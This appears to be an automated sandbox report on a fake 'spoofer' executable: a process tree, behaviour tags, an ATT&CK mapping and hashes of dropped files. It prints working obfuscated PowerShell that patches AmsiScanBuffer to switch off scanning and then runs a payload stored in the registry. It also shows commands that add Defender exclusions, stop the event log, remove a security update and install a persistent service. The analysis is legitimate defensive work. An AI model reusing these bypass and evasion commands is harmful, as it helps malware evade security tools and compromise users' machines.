$_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+'.W'+[Char](105)+'n'+'3'+''+'2'+'.'+'U'+'ns'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+'a'+'ti'+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+'h'+''+[Char](111)+'d'+'s'+'');$gdaRvYyJAREiTx=$coRSyRjcxpUVx.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+'e'+'s'+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AmHUfxaJiQTGZdGHmRp=dwEajVQQVYTh @([String])([IntPtr]);$BCizWbJXClMHSYjchlSBSZ=dwEajVQQVYTh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$axNJWihDdBN=$coRSyRjcxpUVx.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rne'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$ixXSWDZWhdWYpY=$gdaRvYyJAREiTx.Invoke($Null,@([Object]$axNJWihDdBN,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$vnDaSDwNKyrkflLiF=$gdaRvYyJAREiTx.Invoke($Null,@([Object]$axNJWihDdBN,[Object]('V'+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$QKOogBh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ixXSWDZWhdWYpY,$AmHUfxaJiQTGZdGHmRp).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$LJOQhSNVSZYXPaIvm=$gdaRvYyJAREiTx.Invoke($Null,@([Object]$QKOogBh,[Object]('A'+[Char](109)+'si'+[Char](83)+''+[Char](99)+'an'+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fWeItYEhqL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vnDaSDwNKyrkflLiF,$BCizWbJXClMHSYjchlSBSZ).Invoke($LJOQhSNVSZYXPaIvm,[uint32]8,4,[ref]$fWeItYEhqL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LJOQhSNVSZYXPaIvm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vnDaSDwNKyrkflLiF,$BCizWbJXClMHSYjchlSBSZ).Invoke($LJOQhSNVSZYXPaIvm,[uint32]8,0x20,[ref]$fWeItYEhqL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+''+'W'+'A'+'R'+''+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+''+'e'+'r'+[Char](115)+''+'t'+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tXQuPQqfOWlH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fgGnGJCZYLUTeK,[Parameter(Position=1)][Type]$aORWSwqCPh)$sOwmyIWAmvT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+'du'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'','C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$sOwmyIWAmvT.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+'i'+'a'+'l'+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fgGnGJCZYLUTeK).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+'na'+'g'+''+[Char](101)+''+[Char](100)+'');$sOwmyIWAmvT.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+'l'+'ic'+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$aORWSwqCPh,$fgGnGJCZYLUTeK).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $sOwmyIWAmvT.CreateType();}$FsaVWVOCIUABf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+'i'+'c'+'r'+'o'+[Char](115)+'o'+[Char](102)+''+'t'+''+'.'+''+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+''+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+'s'+'');$PUhlfCwTyLidQa=$FsaVWVOCIUABf.GetMethod('Ge'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+'li'+[Char](99)+''+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DKQMFdMhIBxWnHUwMin=tXQuPQqfOWlH @([String])([IntPtr]);$jzYlcSEBIxxBdcNaVvtrKl=tXQuPQqfOWlH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VLixUZyCbXa=$FsaVWVOCIUABf.GetMethod('G'+[Char](101)+''+'t'+''+'M'+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+'dl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$fFjlbHdJXXkSgL=$PUhlfCwTyLidQa.Invoke($Null,@([Object]$VLixUZyCbXa,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$dyAlHeoOXYrAdeGzi=$PUhlfCwTyLidQa.Invoke($Null,@([Object]$VLixUZyCbXa,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$TPofrOP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fFjlbHdJXXkSgL,$DKQMFdMhIBxWnHUwMin).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+'l');$JWLwAyMRcXDyLZERV=$PUhlfCwTyLidQa.Invoke($Null,@([Object]$TPofrOP,[Object]('Am'+'s'+'i'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$BQdOAYzfvk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dyAlHeoOXYrAdeGzi,$jzYlcSEBIxxBdcNaVvtrKl).Invoke($JWLwAyMRcXDyLZERV,[uint32]8,4,[ref]$BQdOAYzfvk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JWLwAyMRcXDyLZERV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dyAlHeoOXYrAdeGzi,$jzYlcSEBIxxBdcNaVvtrKl).Invoke($JWLwAyMRcXDyLZERV,[uint32]8,0x20,[ref]$BQdOAYzfvk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FTW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+'t'+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1452
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1664

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2812

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2884

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3080

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3412
- C:\Users\Admin\AppData\Local\Temp\HaragonSpooferV1.exe
  "C:\Users\Admin\AppData\Local\Temp\HaragonSpooferV1.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAYgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAYgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdwBnACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- - C:\Users\Admin\AppData\Local\Temp\har.exe
    "C:\Users\Admin\AppData\Local\Temp\har.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\har.exe
      "C:\Users\Admin\AppData\Local\Temp\har.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\Root + 2 Minute Start Delay.exe
    "C:\Users\Admin\AppData\Local\Temp\Root + 2 Minute Start Delay.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2736
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1424
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2968
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:764
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1268
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2140
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:3476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "NPPMZHKI"
      4⤵
      Launches sc.exe
      PID:736
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "NPPMZHKI" binpath= "C:\ProgramData\rnxekinradhu\bsulumhydtcf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3144
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2056
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "NPPMZHKI"
      4⤵
      Launches sc.exe
      PID:3560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2428

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4196

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2916

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4236

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1696

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3168

C:\ProgramData\rnxekinradhu\bsulumhydtcf.exe
C:\ProgramData\rnxekinradhu\bsulumhydtcf.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4384
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3740
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3664
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4812
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4324

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Root + 2 Minute Start Delay.exe

Filesize
5.2MB

MD5
9c62d649bd3497b0882814b17988b245

SHA1
c4dd71a48a79c89129519fe1001e58347cfb1df9

SHA256
d4d0c0bbec06df4e3fd45c1334995d3f74747bc6f9e44ccd8260276219abeaee

SHA512
da845a1ada295dcc06fc2d34eb73bac05690e391105474e9d9d64153a2a9bd0b7c49312428322a000bc9aa56f8136b471cfe7bbd9a5cad818928f72b3223f717

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\VCRUNTIME140_1.dll

Filesize
48KB

MD5
68156f41ae9a04d89bb6625a5cd222d4

SHA1
3be29d5c53808186eba3a024be377ee6f267c983

SHA256
82a2f9ae1e6146ae3cb0f4bc5a62b7227e0384209d9b1aef86bbcc105912f7cd

SHA512
f7bf8ad7cd8b450050310952c56f6a20b378a972c822ccc253ef3d7381b56ffb3ca6ce3323bea9872674ed1c02017f78ab31e9eb9927fc6b3cba957c247e5d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\_asyncio.pyd

Filesize
69KB

MD5
80083b99812171fea682b1cf38026816

SHA1
365fb5b0c652923875e1c7720f0d76a495b0e221

SHA256
dbeae7cb6f256998f9d8de79d08c74d716d819eb4473b2725dbe2d53ba88000a

SHA512
33419b9e18e0099df37d22e33debf15d57f4248346b17423f2b55c8da7cbe62c19aa0bb5740cfaac9bc6625b81c54367c0c476eaece71727439686567f0b1234

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\_bz2.pyd

Filesize
82KB

MD5
cb8c06c8fa9e61e4ac5f22eebf7f1d00

SHA1
d8e0dfc8127749947b09f17c8848166bac659f0d

SHA256
fc3b481684b926350057e263622a2a5335b149a0498a8d65c4f37e39dd90b640

SHA512
e6da642b7200bfb78f939f7d8148581259baa9a5edda282c621d14ba88083a9b9bd3d17b701e9cde77ad1133c39bd93fc9d955bb620546bb4fcf45c68f1ec7d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\_cffi_backend.cp313-win_amd64.pyd

Filesize
175KB

MD5
5cba92e7c00d09a55f5cbadc8d16cd26

SHA1
0300c6b62cd9db98562fdd3de32096ab194da4c8

SHA256
0e3d149b91fc7dc3367ab94620a5e13af6e419f423b31d4800c381468cb8ad85

SHA512
7ab432c8774a10f04ddd061b57d07eba96481b5bb8c663c6ade500d224c6061bc15d17c74da20a7c3cec8bbf6453404d553ebab22d37d67f9b163d7a15cf1ded

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40842\_ctypes.pyd

Filesize
128KB

MD5
a55e57d7594303c89b5f7a1d1d6f2b67

SHA1
904a9304a07716497cf3e4eaafd82715874c94f1

SHA256
f63c6c7e71c342084d8f1a108786ca6975a52cefef8be32cc2589e6e2fe060c8

SHA512
